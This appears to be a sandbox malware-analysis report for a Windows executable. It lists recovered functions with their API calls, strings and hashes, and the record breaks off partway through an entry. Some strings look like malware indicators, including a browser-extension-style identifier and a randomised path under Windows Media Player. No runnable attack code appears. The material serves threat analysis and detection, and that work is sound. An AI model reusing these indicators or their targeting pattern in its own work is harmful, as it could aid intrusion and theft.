Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e3650d58ace5e01d80639c9bdd661b0cca838cd5a2a9cc277d233d04e7258adf
Instruction ID: 8a0116b9f5072bc1521342c2bbf29741954c644537d3605baf95f72dc3d6cba6
Opcode Fuzzy Hash: e3650d58ace5e01d80639c9bdd661b0cca838cd5a2a9cc277d233d04e7258adf
Instruction Fuzzy Hash: D141D52290A686C6EB16EF28C4186BDBFA1EB05F84F8B8431C68C073B5CE3C9505C325

Function 00007FF7ABC3E248 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF7ABC3E291
GetLastError.KERNEL32 ref: 00007FF7ABC3E29F
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF7ABC21749), ref: 00007FF7ABC3E2D4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF7ABC21749), ref: 00007FF7ABC3E2E2

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: bf6f6ff787d63ec9e95bb80f5333d1c21f0963902c8af30d1e5921e00fe17b2e
Instruction ID: 70de50cf6248b12e729887e62dc12459778f1f082113ba1b7d75171aff0f781d
Opcode Fuzzy Hash: bf6f6ff787d63ec9e95bb80f5333d1c21f0963902c8af30d1e5921e00fe17b2e
Instruction Fuzzy Hash: 9E216D72A19B9287E3109F16E44472EF6B4F789B90FA50139EB8893B74CF3DD4458B10

Function 00007FF7ABC3E03C Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

SetFileInformationByHandle.KERNEL32 ref: 00007FF7ABC3E05C
GetLastError.KERNEL32 ref: 00007FF7ABC3E066
SetFileInformationByHandle.KERNEL32 ref: 00007FF7ABC3E099
GetLastError.KERNEL32 ref: 00007FF7ABC3E0A3

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ErrorFileHandleInformationLast
String ID:
API String ID: 275135790-0
Opcode ID: c3f294a01001bde1e672a3baf64a8f8c8c5e461723a8d9167fea38aa2c63fd5f
Instruction ID: e2b3008b41a9c360b586c6139b12004de5bb1f0e83e3a8c4ca6db8076f78609e
Opcode Fuzzy Hash: c3f294a01001bde1e672a3baf64a8f8c8c5e461723a8d9167fea38aa2c63fd5f
Instruction Fuzzy Hash: 13F0D131A1918382F7A86B78D454ABDE6A0DF41704FD60131C61A415B4DE2CEACC9B30

Function 00007FF7ABC30810 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

Bad escape sequence in string, xrefs: 00007FF7ABC30BCC
Empty escape sequence in string, xrefs: 00007FF7ABC30C50

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID:
String ID: Bad escape sequence in string$Empty escape sequence in string
API String ID: 0-928816353
Opcode ID: 4839d7d4b103d010759f828f1e26a556bcb70bee1eced7327b0ca9b5a3e41859
Instruction ID: 871f6dab02bbd5733a2243d32e60b4c970ef29dfc1e0fd396aae23ad10775cfa
Opcode Fuzzy Hash: 4839d7d4b103d010759f828f1e26a556bcb70bee1eced7327b0ca9b5a3e41859
Instruction Fuzzy Hash: 6D812133A0A78196EB08AB29D441B7DF761EB51BD4F958232DB9D03BB5CE2CD085C710

Function 00007FF7ABC46BFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7ABC46C26

Strings

csm, xrefs: 00007FF7ABC46C4B
csm, xrefs: 00007FF7ABC46DBA

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: c41babcde769611a9ebafd1821e8d1a95b947c620c220eb6377b327e93ce6598
Instruction ID: a5fe8cfd3119b283f25ad4ab6aa0f335f397c4d5d1ac2e7179e79d672080d546
Opcode Fuzzy Hash: c41babcde769611a9ebafd1821e8d1a95b947c620c220eb6377b327e93ce6598
Instruction Fuzzy Hash: E871E57290A68186DB60AF19D158B7DFBA2FB00B84F958175DE8C07AB9CF3CD651C720

Function 00007FF7ABC1CD20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1CF0C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC1CF12

Strings

, xrefs: 00007FF7ABC1CDA3

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-3916222277
Opcode ID: d461e40776a2a26607069f8d8847df8d43bc6a2efcbe0d367d14b911a9a900f9
Instruction ID: b0223f5efbbc9057c078ba175a1c5fad3e10265dbcdd5bab06ee44cd4f0f0df7
Opcode Fuzzy Hash: d461e40776a2a26607069f8d8847df8d43bc6a2efcbe0d367d14b911a9a900f9
Instruction Fuzzy Hash: 31518C32709B4596EB15EF2AE05426DB7A0FB88B90F854531DB4D57BB0CF38E0A1C310

Function 00007FF7ABC396C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC3987A

Strings

, xrefs: 00007FF7ABC397B0
in Json::Value::getMemberNames(), value must be objectValue, xrefs: 00007FF7ABC39895

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: $in Json::Value::getMemberNames(), value must be objectValue
API String ID: 3668304517-828478770
Opcode ID: fcad06121cb427b66d7428271699ca92353f82652a11d40ff8b1f23b940c495e
Instruction ID: 77f520a8faae386927dd41a6bbed550bcf0089fbc635390dbffc8e77348ca8a0
Opcode Fuzzy Hash: fcad06121cb427b66d7428271699ca92353f82652a11d40ff8b1f23b940c495e
Instruction Fuzzy Hash: 0851C772919B8581EA10EB18E4405AEE361FBC5BD4FD15232E69D03AB5DF7CE494CB10

Function 00007FF7ABC30D40 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC30F14

Strings

additional six characters expected to parse unicode surrogate pair., xrefs: 00007FF7ABC30DB2
expecting another \u token to begin the second half of a unicode surrogate pair, xrefs: 00007FF7ABC30E95

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: additional six characters expected to parse unicode surrogate pair.$expecting another \u token to begin the second half of a unicode surrogate pair
API String ID: 3668304517-1961466578
Opcode ID: 513d0a1c3b93cbef55f5ce4d2acb5fd99c13a7cb91e6d9e34a0cd819b1abd28e
Instruction ID: 653f2a7c3589252ee290b2c88b2af6ad7a496fbcefcde40eeb0a4ccdab017f5e
Opcode Fuzzy Hash: 513d0a1c3b93cbef55f5ce4d2acb5fd99c13a7cb91e6d9e34a0cd819b1abd28e
Instruction Fuzzy Hash: B9412963A1978651EA189B29D440B79E350EB997D0FC05231FADD037FADE3CE1859310

Function 00007FF7ABC24730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC248D2
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC248D8

Strings

egjidjbpglichdcondbcbdnbeeppgdph, xrefs: 00007FF7ABC24734

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: egjidjbpglichdcondbcbdnbeeppgdph
API String ID: 73155330-1098953746
Opcode ID: 1a67e18a9366aa1060cfc313c095b9b362e2404cc651c07e127085b65488f072
Instruction ID: ffcb37995ec6e194ea1995fae787a2e0fecf9e474187223521297ec31aa204ed
Opcode Fuzzy Hash: 1a67e18a9366aa1060cfc313c095b9b362e2404cc651c07e127085b65488f072
Instruction Fuzzy Hash: DE41BD66B1AA9192EA10BB19D00467DA290BB48BE4FD60731DF7C47BF8EE7CD051C320

Function 00007FF7ABC5D1E4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC62074: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC620A7

_get_daylight.LIBCMT ref: 00007FF7ABC5D2FC
_get_daylight.LIBCMT ref: 00007FF7ABC5D30D

Strings

?, xrefs: 00007FF7ABC5D28D

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: be00a9dea23bf6a1188b66e376131877ecdf6e27db4d46faeb8b136f3d777bd6
Instruction ID: 80dd66a22300594f8c5b31b9c9e3e9dcc35081f20a1a6cf439ed3ec323d95956
Opcode Fuzzy Hash: be00a9dea23bf6a1188b66e376131877ecdf6e27db4d46faeb8b136f3d777bd6
Instruction Fuzzy Hash: 16412B22A0A38251FB60AB29A481F7AE660EF80BA4F914335EF5D07AF5DF3CD451C710

Function 00007FF7ABC47294 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7ABC4733E
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF7ABC47367

Strings

csm, xrefs: 00007FF7ABC47467

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: bba117021f344cf8f4e789ab315634a830666d67b1e2a12394e23247ba1d153d
Instruction ID: 3031c0e938228c9a657672740a0125c946fd788fcc82cbc834a658809356eeeb
Opcode Fuzzy Hash: bba117021f344cf8f4e789ab315634a830666d67b1e2a12394e23247ba1d153d
Instruction Fuzzy Hash: 7251C07260A74187EA20EB69E04466DBBB5F788B90F511935DB8D07B76CF3CE161CB20

Function 00007FF7ABC30F20 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC310A5

Strings

Bad unicode escape sequence in string: hexadecimal digit expected., xrefs: 00007FF7ABC3103D
Bad unicode escape sequence in string: four digits expected., xrefs: 00007FF7ABC30F60

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: Bad unicode escape sequence in string: four digits expected.$Bad unicode escape sequence in string: hexadecimal digit expected.
API String ID: 3668304517-3825735986
Opcode ID: 3b96ca3ed2c645b18e49e253127e488c662b08a6fc5aa7bde1f60e7d962cfe14
Instruction ID: fbb90929a38117ba87ef87b95c9fdcd31879eaa5400295e096db3615ee2c557c
Opcode Fuzzy Hash: 3b96ca3ed2c645b18e49e253127e488c662b08a6fc5aa7bde1f60e7d962cfe14
Instruction Fuzzy Hash: A04167A3E196C441EA14EB29D401BBDE351AB897E4FC15331FA6D437F9EE2CE2858710

Function 00007FF7ABC57D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF7ABC57E27
GetLastError.KERNEL32 ref: 00007FF7ABC57E49

Strings

U, xrefs: 00007FF7ABC57DD3

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 26407c493de7ae598b61e49771dd347e6341eebb60b6796b06b6e28fe12133ed
Instruction ID: e6ae71f64a76397e212b809feb99d610a9491d122857468e786710dd6a59cf94
Opcode Fuzzy Hash: 26407c493de7ae598b61e49771dd347e6341eebb60b6796b06b6e28fe12133ed
Instruction Fuzzy Hash: 5E41E562B1AB5186DB109F29E844BB9A7A1FB88B84F814132EE4D87774EF7CD481C750

Function 00007FF7ABC6CF80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC6CFE0
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF7ABC6D016

Strings

Unknown exception, xrefs: 00007FF7ABC6CF8E

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: __std_exception_destroy_invalid_parameter_noinfo_noreturn
String ID: Unknown exception
API String ID: 729085983-410509341
Opcode ID: 7856f3795aebfd0e8b5d61ff23763f898477f6cc05ae6a465f12707c2bb4ec42
Instruction ID: d752b4615909ba3ecd6d95e84dc4036670a4d25e5472044b27f7ccaadb1dd4b6
Opcode Fuzzy Hash: 7856f3795aebfd0e8b5d61ff23763f898477f6cc05ae6a465f12707c2bb4ec42
Instruction Fuzzy Hash: 99110862B1BB0595EB04BB29E448BAD7391DF487A4F810631EA2C473F6DE7CD480C351

Function 00007FF7ABC02C90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC02CA7
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF7ABC02CE6

Part of subcall function 00007FF7ABC3F23C: _Yarn.LIBCPMT ref: 00007FF7ABC3F26A

Strings

bad locale name, xrefs: 00007FF7ABC02CFA

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
String ID: bad locale name
API String ID: 1838369231-1405518554
Opcode ID: 32b7ae8dc5c7a4dabcb2d6b565ab7b2f9c6359523e4baa40e4bebb780e0dcbca
Instruction ID: 925c0969d6c2ec62816e5682330eb8201cf88f1f8e97f1a31bf5e61bdab11793
Opcode Fuzzy Hash: 32b7ae8dc5c7a4dabcb2d6b565ab7b2f9c6359523e4baa40e4bebb780e0dcbca
Instruction Fuzzy Hash: 7301A723206B81CAC748EF79A840158B7A5FB58B88B545135CA8C8372AEF34C490C350

Function 00007FF7ABC6BC33 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC6BC99
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF7ABC6BCCF

Strings

Unknown exception, xrefs: 00007FF7ABC6BC41

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: __std_exception_destroy_invalid_parameter_noinfo_noreturn
String ID: Unknown exception
API String ID: 729085983-410509341
Opcode ID: 3a77e4a1c4750c989717916d7749886f1baedb1c4842d737a8bb0566699bff25
Instruction ID: 584ece039ca8e6956da3144d0cbfef2cb6a197bef495cbb35eec6cb0a76fe3fe
Opcode Fuzzy Hash: 3a77e4a1c4750c989717916d7749886f1baedb1c4842d737a8bb0566699bff25
Instruction Fuzzy Hash: 5D11C662A16B8584EB15BB28D855BAC7391EB44BA4F810131D96D0B7F6EF3CD680C350

Function 00007FF7ABC449C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7ABC3EEE6), ref: 00007FF7ABC44A10
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7ABC3EEE6), ref: 00007FF7ABC44A51

Strings

csm, xrefs: 00007FF7ABC44A3E

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 3a651beb4bf27f5407259cea30834cbdef90a895a548db86fc01e64e268f21f8
Instruction ID: e55331ad07d1cd5100598be27fd2c924717d49a581f678d08d9808f4dcfcf4a5
Opcode Fuzzy Hash: 3a651beb4bf27f5407259cea30834cbdef90a895a548db86fc01e64e268f21f8
Instruction Fuzzy Hash: 5E116032619B8182EB619F19F444669B7E5FB88B84F694234EE8D07778DF3CC551CB10

Function 00007FF7ABC22C10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC22C2E

Part of subcall function 00007FF7ABC3E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF7ABC03F96), ref: 00007FF7ABC3E0C6

Part of subcall function 00007FF7ABC03AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF7ABC03B25
Part of subcall function 00007FF7ABC03AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF7ABC03BCA

Strings

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, xrefs: 00007FF7ABC22C16
G, xrefs: 00007FF7ABC22C1D

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: __std_fs_convert_narrow_to_wide$ApisFile__std_fs_code_page
String ID: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$G
API String ID: 1377543553-4099582714
Opcode ID: c8c0632f238214065625dfbc26c946da351fe81e8c674869c76d141565dec898
Instruction ID: 5da7c0c446dd64657d15d9e0660f61bf0ef45daff0b39c881b5f24aa9e64cae0
Opcode Fuzzy Hash: c8c0632f238214065625dfbc26c946da351fe81e8c674869c76d141565dec898
Instruction Fuzzy Hash: 50E04861A197C682D620AB14A4017A5D354FBCC308F440230DFCC06775DF3CD3858B54

Function 00007FF7ABC22BC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC22BDE

Part of subcall function 00007FF7ABC3E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF7ABC03F96), ref: 00007FF7ABC3E0C6

Part of subcall function 00007FF7ABC03AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF7ABC03B25
Part of subcall function 00007FF7ABC03AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF7ABC03BCA

Strings

